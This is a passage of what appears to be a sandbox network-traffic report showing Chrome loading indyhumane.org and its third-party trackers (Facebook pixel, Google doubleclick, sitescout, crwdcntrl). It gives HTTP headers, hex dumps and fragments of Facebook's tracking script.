                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC572INData Raw: 70 72 5f 63 6f 6e 73 65 6e 74 3d 22 2c 22 68 74 74 70 73 3a 2f 2f 73 79 6e 63 2e 63 72 77 64 63 6e 74 72 6c 2e 6e 65 74 2f 71 6d 61 70 3f 63 3d 31 33 38 39 26 74 70 3d 53 54 53 43 26 74 70 69 64 3d 38 62 30 35 63 66 39 66 2d 37 31 35 36 2d 34 65 38 65 2d 38 30 64 38 2d 33 30 61 32 35 35 63 31 62 30 37 61 2d 36 37 37 66 32 64 37 35 2d 35 35 35 33 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 22 5d 2c 20 62 20 3d 20 30 3b 20 62 20 3c 20 61 2e 6c 65 6e 67 74 68 3b 20 62 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 2e 68 65 69 67 68 74 20 3d 20 31 2c 20 63 2e 77 69 64 74 68 20 3d
                                                                                                                                                                                                                                                        Data Ascii: pr_consent=","https://sync.crwdcntrl.net/qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent="], b = 0; b < a.length; b++) { var c = document.createElement("img"); c.height = 1, c.width =


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        118192.168.2.44989574.125.133.1544432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC617OUTGET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-57291413-5&cid=932040568.1736387953&jid=1658224420&gjid=1630441865&_gid=1054392251.1736387956&_u=YCDAiEABBAAAAGAAI~&z=1577462971 HTTP/1.1
                                                                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgdc:149:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgdc:149:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1INData Raw: 31
                                                                                                                                                                                                                                                        Data Ascii: 1


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        119192.168.2.44989998.98.135.244432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC784OUTGET /up/a9d63b08fec1b65f?cookieQ=1&cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.sitescout.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Attribution-Reporting-Eligible: event-source=navigation-source, trigger
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC463INHTTP/1.1 200
                                                                                                                                                                                                                                                        cache-control: max-age=0,no-cache,no-store
                                                                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                                                                        expires: Tue, 11 Oct 1977 12:34:56 GMT
                                                                                                                                                                                                                                                        p3p: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
                                                                                                                                                                                                                                                        set-cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597; Domain=.sitescout.com; Expires=Fri, 09-Jan-2026 01:59:18 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                                                                        content-length: 43
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        server: AC1.1
                                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        120192.168.2.449904157.240.252.134432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1200OUTGET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-2qF2cYDg' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1669INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                        Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC14893INData Raw: 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f
                                                                                                                                                                                                                                                        Data Ascii: urn!1}return!0}())return;var g=typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbo
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 69 6f 6e 20 67 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 62 3a 61
                                                                                                                                                                                                                                                        Data Ascii: ion g(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function h(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(typeof b==="object"||typeof b==="function")?b:a
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 63 2e 76 61 6c 75 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 61 3d 67 28 61 2c 62 29 3b 76 61 72 20 64 3d 22 22 3b 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6a 28 61 29 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 2e 6c 6f 63 61 6c 65 43 6f 6d 70 61 72 65 28 62 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 29 7d 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 70 72 65 66 69 78 2c 65 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 65 62 70 5f 70 61 74 68 3b 61 3d 61 2e 70 61 72 61 6d 56 61 6c 75 65
                                                                                                                                                                                                                                                        Data Ascii: );return Array.from(c.values())}function h(a,b){a=g(a,b);var d="";b=[].concat(j(a)).sort(function(a,b){return a.paramConfig.query.localeCompare(b.paramConfig.query)});b.forEach(function(a){var b=a.paramConfig.prefix,e=a.paramConfig.ebp_path;a=a.paramValue
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC13402INData Raw: 65 64 49 6e 50 69 78 65 6c 73 28 62 29 2e 69 6e 64 65 78 4f 66 28 63 29 3d 3d 3d 2d 31 7d 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 63 6f 6f 6b 69 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6a 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e
                                                                                                                                                                                                                                                        Data Ascii: edInPixels(b).indexOf(c)===-1}})();return e.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEvents.plugins.cookie",function(){return function(j,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEven
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64
                                                                                                                                                                                                                                                        Data Ascii: on(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 68 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 6f 28 61 2e 69 64 29 3f 7b 7d 3a 7b 69 61 62 3a 31 7d 7d 29 3b 67 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 6f 28 62 29 29 72 65 74 75 72 6e 3b 62 3d 61 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 2b 22 5f 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 22 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 62 3d 6c 28 62 29 3b 76 61 72 20 64 3d 63 2e 67 65 74 28 22 65 69 64 22 29 3b 69 66 28 64 21 3d 6e 75 6c 6c 26 26 64 21 3d 3d 22 22 7c 7c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 63 2e 61 70 70 65 6e 64 28 22 61 70 63 6d 5f 65 69 64 22 2c 22 31 22 29 3b 64 3d 22 70 63 6d 5f 70 6c 75 67 69 6e 2d 73 65 74 5f 22 2b 62 3b 63 2e 61 70
                                                                                                                                                                                                                                                        Data Ascii: h.listen(function(a,b){return!o(a.id)?{}:{iab:1}});g.listen(function(b,c){if(!o(b))return;b=a.location.origin+"_"+Date.now()+"_"+Math.random();b=l(b);var d=c.get("eid");if(d!=null&&d!==""||b==null)return;c.append("apcm_eid","1");d="pcm_plugin-set_"+b;c.ap
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC13402INData Raw: 65 3a 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 22 2c 6c 6f 67 4d 65 73 73 61 67 65 3a 22 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 7d 2c 22 2a 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 41 72 72 61 79 2e
                                                                                                                                                                                                                                                        Data Ascii: e:"Facebook Pixel Error",logMessage:"Pixel code is not installed correctly on this page"},"*");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;function g(a){if(Array.
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1500INData Raw: 76 65 72 73 69 6f 6e 29 7d 63 61 74 63 68 28 61 29 7b 66 3d 21 30 2c 67 3d 61 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 65 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 66 29 74 68 72 6f 77 20 67 7d 7d 75 2e 73 65 74 28 71 2c 53 74 72 69 6e 67 28 62 29 29 3b 78 28 64 2c 75 2c 73 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 6d 65 73 73 61 67 65 3d 22 5b 43 6c 69 65 6e 74 48 69 6e 74 20 45 72 72 6f 72 5d 22 2b 61 2e 6d 65 73 73 61 67 65 2c 6a 28 61 29 7d 29 3b 68 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 64 2e 67 65 74 50 69 78 65 6c 28 62 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 3d 64 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                        Data Ascii: version)}catch(a){f=!0,g=a}finally{try{!e&&h["return"]&&h["return"]()}finally{if(f)throw g}}u.set(q,String(b));x(d,u,s)})["catch"](function(a){a.message="[ClientHint Error]"+a.message,j(a)});h.listen(function(b){b=d.getPixel(b);if(b==null)return;b=d.plugi


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        121192.168.2.449907157.240.0.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC850OUTGET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                        Server: proxygen-bolt
                                                                                                                                                                                                                                                        X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=10, mss=1392, tbw=3403, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
